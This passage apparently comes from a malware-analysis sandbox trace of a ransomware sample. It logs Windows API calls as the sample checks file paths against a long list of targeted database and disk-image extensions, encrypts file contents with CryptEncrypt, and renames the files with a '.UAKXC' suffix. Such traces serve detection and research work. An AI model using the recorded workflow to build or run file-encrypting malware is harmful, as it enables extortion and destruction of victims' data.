lpSrch=".bin") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.041] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.042] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.042] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.042] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.042] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.042] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.043] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.044] SetEndOfFile (hFile=0x6c4) returned 1 [0141.100] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.100] ReadFile (in: hFile=0x6c4, lpBuffer=0x5030000, nNumberOfBytesToRead=0x13a, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x13a, lpOverlapped=0x0) returned 1 [0141.100] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffec6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.100] WriteFile (in: hFile=0x6c4, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x13a, lpOverlapped=0x0) returned 1 [0141.100] CloseHandle (hObject=0x6c4) returned 1 [0141.102] GetProcessHeap () returned 0xea0000 [0141.102] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.102] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" [0141.102] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.UAKXC" [0141.102] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn.uakxc")) returned 1 [0141.103] GetProcessHeap () returned 0xea0000 [0141.103] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.103] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeee00 | out: hHeap=0xea0000) returned 1 [0141.103] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef25b0 | out: hHeap=0xea0000) returned 1 [0141.103] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0141.103] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0141.103] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0141.104] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn")) returned 0x2022 [0141.104] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0141.105] GetLastError () returned 0x0 [0141.105] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=362) returned 1 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.105] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.106] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.107] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.108] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.109] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.110] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.111] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft 